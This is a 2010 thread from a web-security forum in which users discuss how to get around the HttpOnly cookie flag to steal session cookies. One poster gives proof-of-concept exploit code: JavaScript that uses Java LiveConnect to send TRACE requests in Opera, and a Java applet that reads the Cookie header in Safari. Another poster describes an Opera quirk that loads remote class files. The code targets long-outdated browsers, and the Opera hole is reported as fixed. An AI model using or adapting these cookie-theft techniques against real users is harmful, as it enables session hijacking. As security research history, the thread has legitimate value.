Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how bypass a HTTPOnly ?
Posted by: the_master
Date: January 14, 2010 09:56AM

hi all,

i have question.

how bypass httponly,i think by Cross Site Tracing,but
i dont confident

thanks

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: p0deje
Date: January 14, 2010 10:07AM

cross-site tracking uses TRACE, which will only work in IE6 - so don't bother it
it's better to use AJAX with getAllResponseHeaders(), but it again will work not in all browsers

look there http://www.webappsec.org/lists/websecurity/archive/2006-05/msg00025.html
first result in google

---------
http://p0deje.blogspot.com



Edited 2 time(s). Last edit at 01/14/2010 10:10AM by p0deje.

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: p0deje
Date: January 14, 2010 10:11AM

and look http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/

---------
http://p0deje.blogspot.com

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: LeverOne
Date: February 13, 2010 06:57AM

Well, I found ways to get cookies with "httpOnly" in Opera & Safari using java. I can recommend my applet ([code.google.com]) and this article ([forum.antichat.ru], in Russian, 7 months ago).

The essence of ways:

1. Opera:

<?php
header("Set-Cookie: hidden=value; httpOnly");
?>

<script>

alert("Cookie: "+document.cookie);

function javacon(url)
{
 javaurl = new java.net.URL(url);
 conn = javaurl.openConnection();
 conn.setRequestMethod('TRACE');
 var response = '';
 input = conn.getInputStream();
 var lnr = new java.io.LineNumberReader(new java.io.InputStreamReader(input));
 while ((n = lnr.readLine()) != null) response += n + '\n ';
 return response;
}
 
alert(javacon(location.href+'.txt'));

</script>

2. Safari

RequestProperty.java
import java.applet.*;
import java.net.*;
import java.io.*;

public class RequestProperty extends Applet 
{
 public void start() 
 {
  try {
       URL url = getCodeBase();
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       InputStream inp;
       try {
            conn.getInputStream();    // method GET
           }
       catch (IOException ee)
           {
            conn.getErrorStream();
           }
       String cookie = conn.getRequestProperty("Cookie");
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}
 }
}

<applet code=RequestProperty.class width=1 height=1></applet>

LeverOne

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: sirdarckcat
Date: February 13, 2010 07:52AM

those dont get the cookie the user has now right? it returns a new one

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: LeverOne
Date: February 13, 2010 09:05AM

No, these methods can get cookies with "HttpOnly", which the user has now (Set-Cookie is for example).
Quote
sdc
then, the opera one is a cross site tracing vuln
It's obvious! hahaha

Fixed in Opera 10.50!!!



Edited 2 time(s). Last edit at 03/03/2010 01:26PM by LeverOne.

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: sirdarckcat
Date: February 13, 2010 01:47PM

then, the opera one is a cross site tracing vuln.. =/

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: rvdh
Date: February 16, 2010 09:15PM

Very nice find LeverOne! Another reason to zap JS LiveConnect from browsers all together.

Options: ReplyQuote
Re: how bypass a HTTPOnly ?
Posted by: sirdarckcat
Date: February 17, 2010 08:25AM

lol, opera.fail()

new Packages.asdf.asdf.asdf();

makes a request for

/asdf/asdf/asdf.class

haha.. and this:

javascript:alert(new Packages["//sirdarckcat.asdf.asdf"].asdf())

loads

eaea.sirdarckcat.net/asdf/asdf/asdf.class

gotta love opera xDDD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 02/17/2010 08:25AM by sirdarckcat.

Options: ReplyQuote


Sorry, only registered users may post in this forum.